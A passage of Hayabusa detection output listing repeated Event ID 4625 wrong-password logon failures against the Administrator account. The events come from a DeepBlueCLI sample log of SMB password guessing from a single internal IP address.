NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmUk6sW8QreDIZZ5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k0w9SSWaaTX7chM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 46vgsyX5Wxn2rupf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PV8628a8GNKoFyzM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mksBFEFzkC08dB4o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U6QlHT6Bp63JDehd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tRj4fxcRY0Esegl6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dj6zQjZwGEBo0zNt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: imfY1T2VMoaqDSUd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qvPP8UYn9fLpRYl4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rFTGQ5tzNI5k58cK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8Zj3g1WiTLx8OlJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x2Lr6j8Qt4xEmZZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BeDRsguCovO47lKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KqrDyaFTewMPSzD9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nBVMAki1Ghpknf6p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXKhNUmBUQBTyeNM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d1g9TVwsweaBfZgE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kWymb6ucohaBB60b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.747 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LjL0zwlZofVuWhGC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nxsdzkJdnaZs5eKL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PR6EpKvbqMeoQlKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OZ3LMTtsVNI1gRO2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75bNeXwYSZPhJdJ7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lH6TVXSqJb1qLd3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: edDWye6c2UhKznR6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AxKUl1lynGY1ectn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.094 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vI5yUgukPBVRorJI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmR29QcBKMGVQ8rB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.177 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7luV5GfiT0v0h7D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yA7pIDFgQbLIInqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.257 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 84g2gO0253Ut4O1O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DRkFX9WTAhBZ8jc8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WuoQAi4k3XZPaf4O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KjKMhCnbR0uFT0av : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1lfwqPB0AgTfIOt4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mJuG26pQzdjUQael : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GXwEziYTA3DkkFVq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CHr6dirvkT8B9ZVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B5eSMLiF4BsfY3xN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 64ISDuFRhR6cFYVQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hcprXytyuBw380XY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxfQWiSIhZYxwNjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FcL982boDelzeyzK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBAAjRdaR8U0tqt7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EmqUjcltAW6StHQJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 129Rp3HCmRVRXw3C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jpIIQP2oWEF51EBI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.975 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HREGh5ppEkLAuEob : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.022 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UVkpQvotEMfM8R0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dm6uHEy5RJJBJ6FG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HPTyAkYjcIlko5lu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.155 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OjlRoo9Sot4Fx4Th : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XslY26kw2aBw19D8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.242 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1404fakprYeqGiNY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y2VfIjtBcXCRlOjp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.317 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LPztyX4J9NV8EldT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 07flrrzWgsVBYaN2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vgkqkC1VvznGxR6N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hMn6yDMLgLChJTL6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uSTokOJ31Tj0bLXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyRifC46GrNpTA4x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CvNaby30vAT9drAX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wkYSOQ2bD51a4U8l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rqdOquL9Ax01RPPU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.705 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nqCCiK5arcyRHha6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TpyTGZLkAb0w0kgW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wa2pXrZKxeZZYKAq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dK0N5KeBgCze1YWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g4dHlwZjMzI5wU2s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GzF2ouP5KkRfsxnf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RSQxMrGlDiAOo6ri : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gL0rz3p1yG6RhfAT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyChoTSKgJeK6yqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:40.234 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tG4I11dwpBM9SM3l : IP Address: 192.168.198.149 : AuthPackage: 